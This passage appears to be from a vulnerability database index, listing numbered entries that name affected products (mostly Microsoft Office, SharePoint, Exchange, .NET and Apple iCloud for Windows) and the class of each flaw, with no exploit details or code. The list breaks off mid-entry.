SharePoint Enterprise Server 2013 SP1 cross site scripting [128734] Microsoft .NET Framework up to 4.7.2 CORS Filter information disclosure [128732] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 MSHTML Engine privilege escalation [128729] Microsoft Visual Studio 2010 SP1/2012 Update 5 vscontent File information disclosure [128605] WhatsApp Messenger up to 2.18 on Android/iOS/Windows Phone RTP Packet memory corruption [128112] Advantech WebAccess SCADA 8.3.2 on Windows 2008 privilege escalation [127991] IBM DB2 11.1 on Linux/Unix/Windows privilege escalation [127925] Microsoft SharePoint Enterprise Server 2016 cross site scripting [127883] Microsoft Azure Pack Rollup 13.1 cross site scripting [127825] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 privilege escalation [127824] Microsoft Excel up to 2019 information disclosure [127819] Microsoft Exchange Server 2016 CU10/2016 CU11 Profile Data Data Processing Error [127817] Microsoft Excel up to 2019 information disclosure [127814] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 Search information disclosure [127813] Microsoft .NET Framework up to 4.7.2 privilege escalation [127809] Microsoft PowerPoint 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [127806] Microsoft Outlook up to 2019 memory corruption [127805] Microsoft Excel up to 2019 memory corruption [127804] Microsoft Excel up to 2019 memory corruption [127800] Microsoft .NET Framework up to 4.7.2 privilege escalation [127634] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127633] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127632] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127631] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127630] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127629] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127628] Apple iCloud up to 7.8.1 on Windows Safari privilege escalation [127627] Apple iCloud up to 7.8.1 on Windows Safari Address privilege escalation [127609] Apple macOS up to 10.14.1 WindowServer memory corruption [127608] Apple macOS up to 10.14.1 WindowServer memory corruption [127436] HPE Intelligent Management Center up to 7.2 on Windows dbman.exe memory corruption [127047] PHP up to 7.1.24 on Windows com_safearray_proxy ext/standard/var.c denial of service [126938] Microsoft Team Foundation Server 2018 Update 1.1/2018 Update 3 privilege escalation [126794] Microsoft Team Foundation Server cross site scripting [126793] Microsoft Azure App Service on Azure Stack cross site scripting [126754] Microsoft Skype for Business/Lync Server 2013 SP1/2016 Emoji privilege escalation [126749] Microsoft Exchange Server 2010/2013/2016/2019 privilege escalation [126748] Microsoft Office 365 ProPlus/2019 Outlook Message information disclosure [126747] Microsoft SharePoint Enterprise Server 2013 SP1 Folder information disclosure [126746] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126745] Microsoft Project 2010 SP2/2013 SP1/2016 memory corruption [126744] Microsoft Office up to 2019 Word memory corruption [126743] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [126742] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [126734] Microsoft Office 365 ProPlus/2019 information disclosure [126728] Microsoft Office/SharePoint 2010 SP2 Word memory corruption [126727] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126726] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126717] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 privilege escalation [126716] Microsoft Office up to 2019 Excel memory corruption [126715] Microsoft Office 365 ProPlus/2016/2019 Excel memory corruption [126620] PrestaShop up to 1.6.1.22/1.7.4.3 on Windows privilege escalation [126258] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126257] Apple iCloud up to 7.7 on Windows WebKit denial of service [126256] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126255] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126254] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126253] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126252] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126251] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126250] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126249] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126248] Apple iCloud up to 7.7 on Windows Safari Reader Universal cross site scripting [126247] Apple iCloud up to 7.7 on Windows Safari Reader Universal cross site scripting [126246] Apple iCloud up to 7.7 on Windows CoreCrypto Prime Number privilege escalation [125565] Oracle MySQL Server up to 8.0.12 Windows privilege escalation [125129] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XML Content XML External Entity [125127] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XMLA File XML External Entity [125126] Microsoft MQTT Object memory corruption [125124] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XEL File XML External Entity [125116] Microsoft Exchange Server 2013 CU21/2016 CU10 privilege escalation [125107] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [125106] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [125105] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [125104] Microsoft SharePoint Enterprise Server 2016 privilege escalation [125102] Microsoft Office/Word 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 Protected View Data Processing Error [125100] Microsoft Office/PowerPoint 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 Protected View Data Processing Error [125099] Microsoft Office/Excel up to 2019 Protected View Data Processing Error [125095] Microsoft Exchange Server 2013 CU21/2016 CU10 Outlook Web Access privilege escalation [124933] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124924] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124923] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124922] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124921] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124920] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124919] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124918] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124917] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124916] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124915] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124914] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124913] Cisco WebEx Network Recording Player on Windows ARF File memory corruption [124912] Cisco WebEx Network Recording Player on Windows ARF File memory corruption [124911] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124910] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124402] BigTree CMS 4.2.23 on Windows Rewrite Routing launch.php weak authentication [124371] Microsoft Exchange Server up to 2010 SP3 Outlook Web Access /owa/auth/logon.aspx privilege escalation [124064] Tor Browser up to 7.x on Windows Anonymity information disclosure [123995] Microsoft Lync 2011 on Mac Security Feature privilege escalation [123862] Microsoft SharePoint Enterprise Server 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [123861] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [123860] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [123859] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 cross site scripting [123846] Microsoft Office 2016 on Win/Mac memory corruption [123844] Microsoft Word 2013 RT SP1/2013 SP1/2016 PDF File privilege escalation [123840] Microsoft .NET Framework up to 4.7.2 privilege escalation [123459] Docker up to 18.06.0ce-rc1 on Windows HandleRequestAsync privilege escalation [122887] Microsoft Office 2016 on Mac AutoUpdate privilege escalation [122875] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [122874] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [122873] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [122872] Microsoft SharePoint Enterprise Server 2013 SP1/2016 information disclosure [122871] Microsoft PowerPoint 2010 SP2 memory corruption [122870] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [122868] Microsoft .NET Framework up to 4.7.2 information disclosure [122850] Microsoft Visual Studio 2015 Update 3/2017/2017 Version 15.8 Diagnostic Hub privilege escalation [122824] Microsoft Exchange Server Mail memory corruption [122823] Microsoft SQL Server 2016 SP1/2016 SP2/2017 memory corruption [122714] PHP up to 5.6.36/7.0.30/7.1.19/7.2.7 on Windows link_win32.c linkinfo information disclosure [121932] Cisco WebEx Teams on Windows/macOS privilege escalation [121757] Oracle Java SE 7u181/8u172 Windows DLL privilege escalation [121208] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R Attachment privilege escalation [121121] Microsoft .NET Framework up to 4.7.2 Security Feature weak authentication [121120] Microsoft Active Directory Federation Services Web Customizations cross site scripting [121118] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [121117] Microsoft Research JavaScript Cryptography Library Security Feature Incorrect Calculation [121114] Microsoft Access 2013 SP1/2016/2016 C2R memory corruption [121113] Microsoft Lync/Skype for Business privilege escalation [121106] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [121105] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [121100] Microsoft .NET Framework up to 4.7.2 privilege escalation [121098] Microsoft Office 2016/2016 C2R memory corruption [121095] Microsoft .NET Framework 4.7.2 privilege escalation [121094] Microsoft Lync/Skype for Business Security Feature 7PK Security Features [121090] Microsoft Visual Studio up to 2017 Version 15.8 Preview privilege escalation [120986] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120985] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120984] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120983] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120982] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120981] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120980] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120979] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120978] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120977] Apple iCloud up to 7.5 on Windows WebKit race condition [120976] Apple iCloud up to 7.5 on Windows WebKit 7PK Security Features [120975] Apple iCloud up to 7.5 on Windows WebKit privilege escalation [120974] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120973] Apple iCloud up to 7.5 on Windows CFNetwork privilege escalation [119805] ruby-ffi up to 1.9.23 on Windows DLL Loader privilege escalation [119568] Puppet PE Client Tools up to 16.4.5/17.3.5/18.1.1 on Windows Configuration File privilege escalation [119481] Microsoft SharePoint Enterprise Server cross site scripting [119480] Microsoft cross site scripting [119479] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Data Processing Error [119478] Microsoft Office Web Apps Server/Office Online Server privilege escalation [119477] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [119475] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 Attachment privilege escalation [118889] windows-latestchromedriver on Node.js Download chromedriver.exe weak encryption [118884] windows-seleniumjar on Node.js Download weak encryption [118882] windows-iedriver 2.48.0 on Node.js Download iedriverserver.exe weak encryption [118880] windows-selenium-chromedriver on Node.js Download weak encryption [118868] windows-seleniumjar-mirror on Node.js Download weak encryption [118749] Apple iCloud up to 7.4 on Windows WebKit information disclosure [118748] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118747] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118746] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118745] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118744] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118743] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118742] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118741] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118740] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118739] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118738] Apple iCloud up to 7.4 on Windows WebKit race condition [118737] Apple iCloud up to 7.4 on Windows WebKit Data Processing Error [118673] Apple macOS up to 10.13.5 Windows Server memory corruption [118238] McAfee Data Loss Prevention/DLP Endpoint on Windows privilege escalation [118120] Microsoft Office 2016 on Mac XML Data privilege escalation [117561] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1 cross site scripting [117560] Microsoft Exchange Server up to 2016 CU9 memory corruption [117559] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117505] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [117504] Microsoft Office 2010 SP2 information disclosure [117503] Microsoft Exchange Server 2013 CU19/2013 CU20/2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117502] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 cross site scripting [117501] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [117500] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117499] Microsoft Exchange Server up to 2016 CU9 information disclosure [117498] Microsoft Office 2016 C2R Security Feature 7PK Security Features [117497] Microsoft SharePoint Enterprise Server 2010/2013 SP1/2016 cross site scripting [117488] Microsoft Azure IoT SDK AMQP weak authentication [117479] Microsoft .NET Framework up to 4.7.1 XML Data XML External Entity [117473] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117472] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117471] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117470] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117469] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117468] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [116274] 7-zip up to 18.01 on Windows Access Restriction LsaAddAccountRights privilege escalation [116133] Microsoft Visual Studio information disclosure [116132] Microsoft Office 2016 Memory information disclosure [116051] Microsoft SharePoint Enterprise Server 2016 privilege escalation [116050] Microsoft SharePoint Enterprise Server 2010 SP2/2013/2016 privilege escalation [116049] Microsoft SharePoint Enterprise Server 2013/2016 Redirect [116046] Microsoft SharePoint Enterprise Server 2013/2016 Share privilege escalation [116023] Microsoft Office up to 2016 C2R information disclosure [116022] Microsoft Excel 2010 SP2 memory corruption [116018] Microsoft Office 2013 RT SP1/2013 SP1/2016/2016 C2R Data Processing Error [116017] Microsoft Excel up to 2016 C2R memory corruption [116016] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Graphics privilege escalation [116015] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 memory corruption [116014] Microsoft Office 2013 RT SP1/2013 SP1/2016/2016 C2R Data Processing Error [116013] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1 memory corruption [115616] Apple iCloud up to 7.1 on Windows CFNetwork Session memory corruption [115608] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115602] Apple iCloud up to 7.1 on Windows WebKit Redirect [115585] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115580] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115550] Apple iCloud up to 6.1 on Windows WebKit information disclosure [115488] Apple iCloud up to 7.3 on Windows WebKit information disclosure [115487] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115486] Apple iCloud up to 7.3 on Windows WebKit privilege escalation [115485] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115484] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115483] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115482] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115481] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115480] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115479] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115478] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115477] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115476] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115475] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115474] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115473] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115472] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115471] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115470] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115469] Apple iCloud up to 7.3 on Windows Security memory corruption [115445] Apple macOS up to 10.13.4 WindowServer Keylogger 7PK Security Features [115072] Philips IntelliSpace Portal 7.0.x/8.0.x Windows Permission privilege escalation [114579] Microsoft Exchange Server up to 2017 CU8 Outlook Web Access information disclosure [114574] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114573] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114571] Microsoft Exchange Server 2016 CU7/2016 CU8 Outlook Web Access information disclosure [114570] Microsoft Exchange Server 2010 SP3/2013 CU18/2013 CU19/2016 CU7/2016 CU8 Outlook Web Access Fake information disclosure [114564] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [114563] Microsoft Office 2007 SP3/2010 SP2/2013/2013 RT SP1 memory corruption [114562] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114561] Microsoft Office/SharePoint information disclosure [114560] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114559] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114558] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114557] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114556] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114555] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114554] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114553] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114552] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114551] Microsoft Excel up to 2016 C2R Security Feature 7PK Security Features [114549] Microsoft Access 2010 SP2/2013 SP1/2016 memory corruption [113330] HPE System Management Homepage up to 7.6.0 on Windows/Linux privilege escalation [113329] HPE System Management Homepage up to 7.6.0 on Windows/Linux privilege escalation [113328] HPE System Management Homepage up to 7.6.0 on Windows/Linux memory corruption [113327] HPE System Management Homepage up to 7.6.0 on Windows/Linux denial of service [113326] HPE System Management Homepage up to 7.6.0 on Windows/Linux cross site scripting [113237] Microsoft SharePoint Enterprise Server 2016 cross site scripting [113236] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [113235] Microsoft Outlook 2007 SP3/2010 SP2/2013 SP1/2016 privilege escalation [113234] Microsoft Office 2007 SP2/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [113233] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [113232] Microsoft Excel 2016 privilege escalation [113216] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [113124] LibreOffice up to 6.0.1 COM.MICROSOFT.WEBSERVICE File privilege escalation [112285] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112284] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112283] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112282] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111912] IBM DB2 up to 9.7/10.1 FP5/10.5 FP7 on AIX/Linux/HP/Solaris/Windows Subquery OLAP privilege escalation [111580] Microsoft Office 2016 on Mac Email Attachment privilege escalation [111578] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111577] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111576] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111575] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111574] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111573] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111572] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111571] Microsoft SharePoint Enterprise Server 2013/2016 Access cross site scripting [111570] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111569] Microsoft Office RTF memory corruption [111568] Microsoft Excel 2007/2010/2013/2016 memory corruption [111567] Microsoft Office 2010/2013/2016 memory corruption [111566] Microsoft Word 2007/2010/2013/2016 memory corruption [111565] Microsoft Word 2007/2010/2013 Email Message privilege escalation [111564] Microsoft Word 2016 memory corruption [111563] Microsoft Outlook 2007/2010/2013/2016 Email Message privilege escalation [111562] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111561] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111557] Microsoft .NET Framework up to 5.7 XML Data Processing Error [111128] Apple iCloud up to 7.1 on Windows WebKit memory corruption [110670] vBulletin up to 5.3.x on Windows directory traversal [110553] Microsoft Office 2016 C2R information disclosure [110552] Microsoft SharePoint Enterprise Server 2016 Web Request privilege escalation [110551] Microsoft Excel 2016 C2R memory corruption [110550] Microsoft PowerPoint 2013 RT SP1/2013 SP1/2016 information disclosure [110549] Microsoft Exchange Server 2016 CU6/2016 CU7 Outlook Web Access privilege escalation [109519] npm KyleRoss windows-cpu on Node.js privilege escalation [109391] Microsoft SharePoint Enterprise Server 2016 Project Server cross site request forgery [109389] Microsoft Excel 2016 Click-to-Run memory corruption [109388] Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 memory corruption [109386] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [109385] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Security Feature Macro 7PK Security Features [109381] Microsoft Office/Word 2007 SP3/2010 SP2 memory corruption [109358] Microsoft .NET Framework 1.0/1.1/2.0 weak authentication [109273] Savitech Driver Package on Windows weak authentication [108287] Ikarus Anti Virus 2.16.7 on Windows guardxup.exe privilege escalation [107742] Microsoft Lync/Skype for Business Authentication privilege escalation [107741] Microsoft Outlook 2016 Secure Connection Mail information disclosure [107732] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [107729] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107728] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107727] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107703] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [107698] Microsoft Office 2016 memory corruption [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method privilege escalation [106545] Microsoft .NET Framework up to 4.7 privilege escalation [106544] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [106531] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [106530] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106529] Microsoft PowerPoint 2016 memory corruption [106528] Microsoft PowerPoint 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106476] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106475] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106474] Microsoft Office 2016 memory corruption [106473] Microsoft SharePoint Server 2013 SP1 cross site scripting [106470] Microsoft Excel 2011 on Mac memory corruption [106455] Microsoft Exchange Server 2013/2016 information disclosure [105723] Atlassian FishEye/Crucible up to 4.4.0 on Windows MultiPathResource directory traversal [105035] Microsoft SharePoint Server 2010 SP2 cross site scripting [105008] Microsoft SQL Server 2012/2014/2016 Analysis Services information disclosure [104584] Microsoft Outlook up to 2016 C2R Document File privilege escalation [104583] Microsoft Outlook up to 2016 C2R Email privilege escalation [104582] Microsoft Outlook up to 2016 C2R Object information disclosure [104285] Apple iCloud up to 6.2.1 on Windows WebKit Web Inspector memory corruption [104284] Apple iCloud up to 6.2.1 on Windows WebKit Page Loading memory corruption [104282] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104281] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104280] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104279] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104278] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104277] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104276] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104275] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104274] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104273] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104272] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104271] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104270] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104269] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104268] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104267] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104266] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104265] Apple iCloud up to 6.2.1 on Windows libxml2 information disclosure [104264] Apple iCloud up to 6.2.1 on Windows libxml2 information disclosure [103468] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 Redirect [103443] Microsoft .NET Framework 4.6/4.6.1/4.6.2/4.7 privilege escalation [103434] Microsoft Office Object Data Processing Error [103433] Microsoft SharePoint privilege escalation [103426] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 OWA cross site scripting [103425] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 OWA cross site scripting [103422] Microsoft Office Object memory corruption [103421] Microsoft Office Object memory corruption [103403] Microsoft Office Object memory corruption [103214] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103213] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103212] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103211] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103145] SWFTools 2013-04-09-1007 on Windows font2swf Access Violation memory corruption [102938] Microsoft Azure AD Connect Password Writeback privilege escalation [102821] Microsoft Skype up to 7.2/7.35/7.36 RDP Clipboard MSFTEDIT.DLL memory corruption [102814] NetKVM Windows Virtio Driver IP Packet privilege escalation [102783] Microsoft Malware Protection Engine up to 1.1.13804.0 on 32-bit mpengine.dll privilege escalation [102463] Microsoft Project Server 2013 SP1 cross site scripting [102462] Microsoft Skype for Business/Lync Server HTML privilege escalation [102460] Microsoft Outlook 2016 on Mac HTML privilege escalation [102448] Microsoft SharePoint Enterprise Server 2016 Reflected cross site scripting [102447] Microsoft PowerPoint/SharePoint Server 2007 SP3 memory corruption [102446] Microsoft Office up to 2016 Data Processing Error [102445] Microsoft Office 2010 SP2/2011/2013 RT SP1/2013 SP1/2016 Data Processing Error [102444] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Data Processing Error [102443] Microsoft Office up to 2016 Data Processing Error [102442] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 7PK Security Features [102441] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [102397] Microsoft Outlook 2010 SP1/2013 SP1/2016 DLL Loader privilege escalation [102396] Microsoft Office 2013 SP1/2016 DLL Loader privilege escalation [101949] BigTree CMS up to 4.2.18 on Windows file-browser.php directory traversal [101614] IBM Informix Open Admin Tool 11.5/11.7/12.1 on Windows privilege escalation [101356] Apple iCloud up to 6.2.0 on Windows WebKit memory corruption [101020] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [101019] Microsoft Skype for Business 2016 Data Processing Error [101018] Microsoft SharePoint 2010 SP2/2013 SP1/2016 Data Processing Error [101017] Microsoft Office 2007 SP3/2010 SP2/2016 Data Processing Error [101016] Microsoft PowerPoint 2011 on Mac memory corruption [101015] Microsoft PowerPoint 2011 on Mac memory corruption [101014] Microsoft Office 2010 SP2/2016 Data Processing Error [101013] Microsoft Office 2010 SP2/2016 privilege escalation [101012] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1/2016 memory corruption [101003] Microsoft .NET Framework up to 4.7 Certificate Validation 7PK Security Features [100801] BMC Server Automation up to 8.6 SP1 Patch 1/8.7 Patch 2 on Windows RSCD Agent privilege escalation [99697] Microsoft SharePoint Server 2010 SP1/2010 SP2 Excel Services cross site scripting [99684] Microsoft Excel 2007 SP3/2010 SP2 Memory information disclosure [99682] Microsoft Outlook 2011 on Mac HTML Tag Validator privilege escalation [99654] Microsoft Outlook 2007 SP3/2010 SP2/2011/2013 SP1/2016 Email Message privilege escalation [99653] Microsoft Outlook 2007 SP3/2010 SP2/2011/2013 SP1/2016 Email Message memory corruption [99533] Microsoft Office 2007/2010/2013/2016 RTF Document Necurs Dridex privilege escalation [98548] ntp up to 4.2.8p9 on Windows Data Structure memory corruption [98476] Microsoft Skype 7.16.0.102 DLL Loader Skype.exe privilege escalation [98097] Microsoft IIS 7.0/7.5/8.0/8.5/10 /uncpath/ cross site scripting [98096] Microsoft Exchange 2013 SP1 cross site scripting [98095] Microsoft Lync for Mac 2011 Certificate Validation weak authentication [98094] Microsoft SharePoint Server 2013 SP1 cross site scripting [98093] Microsoft SharePoint Server/Office Web Apps 2010 SP2 information disclosure [98092] Microsoft SharePoint Server 2007 SP3 memory corruption [98091] Microsoft SharePoint Server/Office Web Apps 2010 SP2 memory corruption [98090] Microsoft SharePoint Server 2010 